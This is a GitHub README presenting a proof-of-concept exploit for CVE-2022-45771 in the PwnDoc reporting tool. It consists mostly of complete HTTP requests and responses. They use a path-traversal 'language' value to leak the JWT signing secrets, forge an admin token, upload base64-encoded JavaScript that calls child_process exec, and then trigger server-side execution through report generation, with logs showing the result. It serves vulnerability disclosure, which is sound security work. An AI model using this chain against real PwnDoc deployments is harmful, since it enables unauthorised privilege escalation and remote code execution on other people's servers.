Skip to content
/ CVE-2022-45771 Public

[PoC] Privilege escalation & code execution via LFI in PwnDoC

6 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

yuriisanin/CVE-2022-45771

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
README.md
README.md
 
 
demo-banner.png
demo-banner.png
 
 

Repository files navigation

CVE-2022-45771

The PwnDoc is vulnerable to both path traversal and local file inclusion (LFI), which allows unprivileged users to disclose JWT secrets and achive code execution.

Requirements:

  • An attacker has valid account with user role
  • The application has a report template with either finding.vulnType or finding.category tag

video-poc

Details

The vulnerability chain consists of the next parts:

  1. Missing validation of AuditSchema.language property on both model and endpoint levels. (See /backend/src/models/audit.js, line: 71, /backend/src/routes/audit.js, line: 57)
  2. Use of require function with user-supplied AuditSchema.language parameter during report generation. (See /backend/src/translate/index.js, line: 10, /backend/src/lib/report-generator.js, lines: 24-25, 477, 487)
  3. Exposed jwtSecret and jwtRefreshSecret parameters via module exports in auth.js file. (See /backend/src/lib/auth.js, lines: 17-21)
  4. Insecure template file upload functionality allows uploading js files (requires template:create permission).

[PoC] JWT secret disclosure leads to privilege escalation

  1. Create an audit with ../lib/auth.js as language, later the file will be loaded and executed using require function and as a result both jwtSecret and jwtRefreshSecret will be exported.

Request:

POST /api/audits HTTP/1.1
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=utf-8
Origin: https://127.0.0.1:8443
Content-Length: 73
Accept-Language: en-GB,en;q=0.9
Host: 127.0.0.1:8443
User-Agent: {user-agent}
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: token=JWT%20{token}


{"name":"privesc-poc","language":"../lib/auth.js","auditType":"tested"}

Response:

HTTP/1.1 201 Created
Server: nginx/1.22.1
Date: Sun, 20 Nov 2022 15:34:32 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 598
Connection: keep-alive
X-Powered-By: Express
Access-Control-Allow-Methods: GET,POST,DELETE,PUT,OPTIONS
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Expose-Headers: Content-Disposition

{"status":"success","datas":{"message":"Audit created successfully","audit":{"collaborators":[],"reviewers":[],"state":"EDIT","approvals":[],"_id":"637a49086f5a2e0012dd58c5","name":"privsec-poc","language":"../lib/auth.js","auditType":"tested","creator":"637a2065ab932e0012015580","sections":[],"customFields":[],"sortFindings":[{"category":"jjj","sortValue":"cvssScore","sortOrder":"desc","sortAuto":true},{"category":"dd","sortValue":"cvssScore","sortOrder":"desc","sortAuto":true}],"scope":[],"findings":[],"createdAt":"2022-11-20T15:34:32.246Z","updatedAt":"2022-11-20T15:34:32.246Z","__v":0}}}
  1. Set a report template for the audit. Note that template should contain either finding.vulnType - {vulnType} or finding.category - {category} tag. See templating doc**

Request:

PUT /api/audits/637a49086f5a2e0012dd58c5/general HTTP/1.1
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=utf-8
Origin: https://127.0.0.1:8443
Content-Length: 207
Accept-Language: en-GB,en;q=0.9
Host: 127.0.0.1:8443
User-Agent: {user-agent}
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: token=JWT%20{token}


{"collaborators":[],"reviewers":[],"_id":"637a49086f5a2e0012dd58c5","name":"privesc-poc","language":"../lib/auth.js","auditType":"tested","customFields":[],"template":"6377d57e5cccb10012049dbb","scope":[]}

Response:

HTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Sun, 20 Nov 2022 15:34:43 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 65
Connection: keep-alive
X-Powered-By: Express
Access-Control-Allow-Methods: GET,POST,DELETE,PUT,OPTIONS
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Expose-Headers: Content-Disposition

{"status":"success","datas":"Audit General updated successfully"}
  1. Add finding to the audit. Note that either category or vulnType property should contain jwtSecret.**

Request:

POST /api/audits/637a49086f5a2e0012dd58c5/findings HTTP/1.1
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=utf-8
Origin: https://127.0.0.1:8443
Content-Length: 368
Accept-Language: en-GB,en;q=0.9
Host: 127.0.0.1:8443
User-Agent: {user-agent}
Referer: https://127.0.0.1:8443/audits/637a2106ab932e0012015583/findings/add
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: token=JWT%20{token}

{"title":"dsdsd","vulnType":"prod","description":"{description}","observation":"{observation}","references":[],"cvssv3":"CVSS:3.1/AV:A/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L","category":null,"customFields":[], "category":"jwtSecret", "vulnType":"jwtRefreshSecret"}

Response:

HTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Sun, 20 Nov 2022 15:34:54 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 65
Connection: keep-alive
X-Powered-By: Express
Access-Control-Allow-Methods: GET,POST,DELETE,PUT,OPTIONS
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Expose-Headers: Content-Disposition

{"status":"success","datas":"Audit Finding created successfully"}
  1. Generate a report for the previously create audit, and get jwtSecret's value from the created docx document.

Request:

GET /api/audits/637a49086f5a2e0012dd58c5/generate HTTP/1.1
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate, br
Host: 127.0.0.1:8443
User-Agent: {user-agent}
Accept-Language: en-GB,en;q=0.9
Referer: https://127.0.0.1:8443/audits/637a2106ab932e0012015583/findings/add
Connection: keep-alive
Cookie: token=JWT%20{token}

Response:

HTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Sun, 20 Nov 2022 15:37:34 GMT
Content-Type: application/octet-stream
Content-Length: 98134
Connection: keep-alive
X-Powered-By: Express
Access-Control-Allow-Methods: GET,POST,DELETE,PUT,OPTIONS
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Expose-Headers: Content-Disposition
Content-Disposition: attachment; filename="rce-poc.docx"

{doc-content}
  1. Change the role field to admin inside your JWT token and sign it using obtained jwtSecret.

JWT paload:

{
  "id": "637a2065ab932e0012015580",
  "username": "justuser",
  "role": "admin",
  "firstname": "justuser",
  "lastname": "justuser",
  "email": "justuser@0d.tf",
  "phone": "12345",
  "roles": [
    "audits:create",
    "audits:read",
    "audits:update",
    "audits:delete",
    "images:create",
    "images:read",
    "clients:create",
    "clients:read",
    "clients:update",
    "clients:delete",
    "companies:create",
    "companies:read",
    "companies:update",
    "companies:delete",
    "languages:read",
    "audit-types:read",
    "vulnerability-types:read",
    "vulnerability-categories:read",
    "sections:read",
    "templates:read",
    "users:read",
    "roles:read",
    "vulnerabilities:read",
    "vulnerability-updates:create",
    "custom-fields:read",
    "settings:read-public"
  ],
  "iat": 1668958053,
  "exp": 1668958953
}

[PoC] Achieving code execution

After revealing JWT secret and adding ethier admin role or template:create permission, an attacker could use path traversal attack to execute JS code uploaded using template upload functionality.

  1. Upload js file using report upload functionality.

Request:

POST /api/templates HTTP/1.1s
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=utf-8
Origin: https://127.0.0.1:8443
Content-Length: 571
Accept-Language: en-GB,en;q=0.9
Host: 127.0.0.1:8443
User-Agent: {user-agent}
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: token=JWT%20{token}

{"name":"exploit-poc","file":"Y29uc29sZS5sb2coJ1tQT0NdIC0gU3RhcnQgb2YgY29kZSBleGVjdXRpb24uJyk7Cgpjb25zdCB7IGV4ZWMgfSA9IHJlcXVpcmUoImNoaWxkX3Byb2Nlc3MiKTsKCmV4ZWMoImxzIC1sYSIsIChlcnJvciwgc3Rkb3V0LCBzdGRlcnIpID0+IHsKICAgIGlmIChlcnJvcikgewogICAgICAgIGNvbnNvbGUubG9nKGBlcnJvcjogJHtlcnJvci5tZXNzYWdlfWApOwogICAgICAgIHJldHVybjsKICAgIH0KICAgIGlmIChzdGRlcnIpIHsKICAgICAgICBjb25zb2xlLmxvZyhgc3RkZXJyOiAke3N0ZGVycn1gKTsKICAgICAgICByZXR1cm47CiAgICB9CiAgICBjb25zb2xlLmxvZyhgc3Rkb3V0OiAke3N0ZG91dH1gKTsKfSk7CmNvbnNvbGUubG9nKCdbUE9DXSAtIEVuZCBvZiBjb2RlIGV4ZWN1dGlvbi4nKTsK","ext":"js"}

Response:

HTTP/1.1 201 Created
Server: nginx/1.22.1
Date: Sun, 20 Nov 2022 15:36:24 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 95
Connection: keep-alive
X-Powered-By: Express
Access-Control-Allow-Methods: GET,POST,DELETE,PUT,OPTIONS
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Expose-Headers: Content-Disposition

{"status":"success","datas":{"_id":"637a49786f5a2e0012dd58c7","name":"exploit-poc","ext":"js"}}

The content of the file is base64 encoded JS code:

console.log('[POC] - Start of code execution.');

const { exec } = require("child_process");

exec("ls -la", (error, stdout, stderr) => {
    if (error) {
        console.log(`error: ${error.message}`);
        return;
    }
    if (stderr) {
        console.log(`stderr: ${stderr}`);
        return;
    }
    console.log(`stdout: ${stdout}`);
});
console.log('[POC] - End of code execution.');
  1. Create an audit with ../../report-templates/exploit-poc.js as AuditSchema.language property, later the file will be loaded and executed using require function.

Request:

POST /api/audits HTTP/1.1
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=utf-8
Origin: https://127.0.0.1:8443
Content-Length: 130
Accept-Language: en-GB,en;q=0.9
Host: 127.0.0.1:8443
User-Agent: {user-agent}
Referer: https://127.0.0.1:8443/audits
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: token=JWT%20{token-with-privileges}

{"name":"rce-poc","language":"../../report-templates/exploit-poc.js","auditType":"tested"}

Response:

HTTP/1.1 201 Created
Server: nginx/1.22.1
Date: Sun, 20 Nov 2022 15:36:37 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 617
Connection: keep-alive
X-Powered-By: Express
Access-Control-Allow-Methods: GET,POST,DELETE,PUT,OPTIONS
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Expose-Headers: Content-Disposition

{"status":"success","datas":{"message":"Audit created successfully","audit":{"collaborators":[],"reviewers":[],"state":"EDIT","approvals":[],"_id":"637a49856f5a2e0012dd58c8","name":"rce-poc","language":"../../report-templates/exploit-poc.js","auditType":"tested","creator":"637a2065ab932e0012015580","sections":[],"customFields":[],"sortFindings":[{"category":"jjj","sortValue":"cvssScore","sortOrder":"desc","sortAuto":true},{"category":"dd","sortValue":"cvssScore","sortOrder":"desc","sortAuto":true}],"scope":[],"findings":[],"createdAt":"2022-11-20T15:36:37.885Z","updatedAt":"2022-11-20T15:36:37.885Z","__v":0}}}
  1. Set any valid template for the audit.

Request:

PUT /api/audits/637a49856f5a2e0012dd58c8/general HTTP/1.1
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=utf-8
Origin: https://127.0.0.1:8443
Content-Length: 224
Accept-Language: en-GB,en;q=0.9
Host: 127.0.0.1:8443
User-Agent: {user-agent}
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: token={token-with-privileges}

{"collaborators":[],"reviewers":[],"_id":"637a49856f5a2e0012dd58c8","name":"rce-poc","language":"../../report-templates/exploit-poc.js","auditType":"tested","customFields":[],"template":"6377d57e5cccb10012049dbb","scope":[]}

Response:

HTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Sun, 20 Nov 2022 15:37:02 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 65
Connection: keep-alive
X-Powered-By: Express
Access-Control-Allow-Methods: GET,POST,DELETE,PUT,OPTIONS
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Expose-Headers: Content-Disposition

{"status":"success","datas":"Audit General updated successfully"}
  1. Trigger report generation to achieve code execution.

Request:

GET /api/audits/637a49856f5a2e0012dd58c8/generate HTTP/1.1
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate, br
Host: 127.0.0.1:8443
User-Agent: {user-agent}
Accept-Language: en-GB,en;q=0.9
Referer: https://127.0.0.1:8443/audits/637a2106ab932e0012015583/findings/add
Connection: keep-alive
Cookie: token=JWT%20{token}

Response:

HTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Sun, 20 Nov 2022 15:37:34 GMT
Content-Type: application/octet-stream
Content-Length: 98134
Connection: keep-alive
X-Powered-By: Express
Access-Control-Allow-Methods: GET,POST,DELETE,PUT,OPTIONS
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Expose-Headers: Content-Disposition
Content-Disposition: attachment; filename="rce-poc.docx"

{doc-content}

The following logs should appear:

pwndoc-backend     | [POC] - Start of code execution.
pwndoc-backend     | [POC] - End of code execution.
pwndoc-backend     | stdout: total 1156
pwndoc-backend     | drwxr-xr-x    1 root     root          4096 Nov 18 12:05 .
pwndoc-backend     | drwxr-xr-x    1 root     root          4096 Nov 18 13:00 ..
pwndoc-backend     | -rw-r--r--    1 root     root            23 Nov 18 11:43 .dockerignore
pwndoc-backend     | -rw-r--r--    1 root     root           266 Nov 18 11:43 Dockerfile
pwndoc-backend     | -rw-r--r--    1 root     root           249 Nov 18 11:43 Dockerfile.dev
pwndoc-backend     | -rw-r--r--    1 root     root           250 Nov 18 11:43 Dockerfile.test
pwndoc-backend     | -rw-r--r--    1 root     root           412 Nov 18 11:43 README.md
pwndoc-backend     | -rw-r--r--    1 root     root           204 Nov 18 11:43 babel.config.js
pwndoc-backend     | -rw-r--r--    1 root     root           749 Nov 18 11:43 docker-compose.dev.yml
pwndoc-backend     | -rw-r--r--    1 root     root           367 Nov 18 11:43 docker-compose.test.yml
pwndoc-backend     | -rw-r--r--    1 root     root            67 Nov 18 11:43 jest.config.js
pwndoc-backend     | drwxr-xr-x  594 root     root         20480 Nov 18 12:05 node_modules
pwndoc-backend     | -rw-r--r--    1 root     root       1100446 Nov 18 11:43 package-lock.json
pwndoc-backend     | -rw-r--r--    1 root     root          1255 Nov 18 11:43 package.json
pwndoc-backend     | drwxr-xr-x   10 root     root           320 Nov 20 15:36 report-templates
pwndoc-backend     | drwxr-xr-x    7 root     root          4096 Nov 18 12:04 src
pwndoc-backend     | drwxr-xr-x    2 root     root          4096 Nov 18 12:04 ssl
pwndoc-backend     | drwxr-xr-x    2 root     root          4096 Nov 18 12:04 tests
pwndoc-backend     |

Support

You can follow me on Twitter, GitHub or YouTube.

About

[PoC] Privilege escalation & code execution via LFI in PwnDoC

Topics

exploit rce privilege-escalation privesc pwndoc

Resources

Readme
Activity

Stars

6 stars

Watchers

1 watching

Forks

0 forks
Report repository